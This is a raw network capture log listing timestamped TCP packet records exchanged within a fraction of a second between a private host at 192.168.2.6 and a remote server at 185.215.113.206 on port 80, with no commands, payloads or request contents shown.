                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242696047 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242749929 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242784023 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242798090 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242820978 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242836952 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242849112 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242849112 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242862940 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242878914 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242892981 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242908955 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242917061 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242933989 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242950916 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242976904 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242994070 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242999077 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.242999077 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243021011 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243040085 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243046999 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243053913 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243081093 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243098021 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243098974 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243124008 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243139029 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243144989 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243154049 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243194103 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.243194103 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278493881 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278521061 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278537035 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278553009 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278568029 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278583050 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278583050 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278599024 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278611898 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278626919 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278641939 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278650999 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278698921 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.278698921 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279272079 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279287100 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279304028 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279334068 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279356003 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279361010 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279371023 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279397011 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279405117 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279422998 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279438972 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279472113 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279500961 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279515982 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279531956 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279546976 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279561996 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279577971 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279588938 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279596090 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279613018 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279628992 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279645920 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279654026 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279654026 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279660940 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279678106 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279689074 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279691935 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279709101 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279745102 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279768944 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279784918 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279793024 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279798985 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279824018 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279839993 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279854059 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279855967 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279881954 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279896975 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279912949 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279927969 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279931068 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279931068 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279964924 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279980898 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279984951 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279984951 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.279998064 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.280015945 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.280030966 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.280034065 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.280047894 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.280062914 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.280085087 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.280119896 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289258957 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289274931 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289288998 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289304972 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289319992 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289377928 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289393902 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289586067 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289586067 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289586067 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.289586067 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328398943 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328413010 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328438044 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328457117 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328471899 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328473091 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328489065 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328506947 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328522921 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328536987 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328552961 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328563929 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328571081 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328589916 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328604937 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328608036 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328608036 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328619957 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328633070 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328649998 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328669071 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328682899 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328697920 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328712940 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328727961 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328730106 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328730106 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328743935 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328778982 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328780890 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328797102 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328813076 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328828096 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328845024 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328849077 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328850031 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328896046 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328896046 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328912020 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328927040 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328938961 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328965902 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328982115 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328983068 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.328989983 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329004049 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329020023 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329035997 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329050064 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329066038 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329066038 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329077959 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329096079 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329111099 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329127073 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329128027 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329143047 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329171896 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329178095 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329178095 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329197884 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329210997 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329226971 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329231024 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329256058 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329266071 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329271078 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329286098 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329301119 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329317093 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329322100 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329322100 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329332113 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329348087 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329364061 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329372883 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329372883 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329380035 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329415083 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329469919 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329675913 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329706907 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329724073 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329731941 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329747915 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329766989 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329776049 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329776049 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329782009 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329802036 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329807043 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329828978 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329837084 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329843998 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329869032 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329884052 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329899073 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329899073 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329900026 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329926014 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329941988 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329948902 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329957962 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329974890 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329988956 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329993963 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.329993963 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330014944 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330028057 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330043077 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330060005 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330068111 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330068111 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330087900 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330106974 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330122948 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330136061 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330136061 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.330190897 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367660999 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367676973 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367692947 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367707014 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367790937 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367790937 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367815018 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367830992 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367841005 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367841005 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367886066 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367887974 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367899895 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367928982 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367943048 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367953062 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367969036 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367990971 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.367995024 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.368012905 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.368030071 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.368038893 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.368038893 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.368042946 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.368066072 CET8049742185.215.113.206192.168.2.6
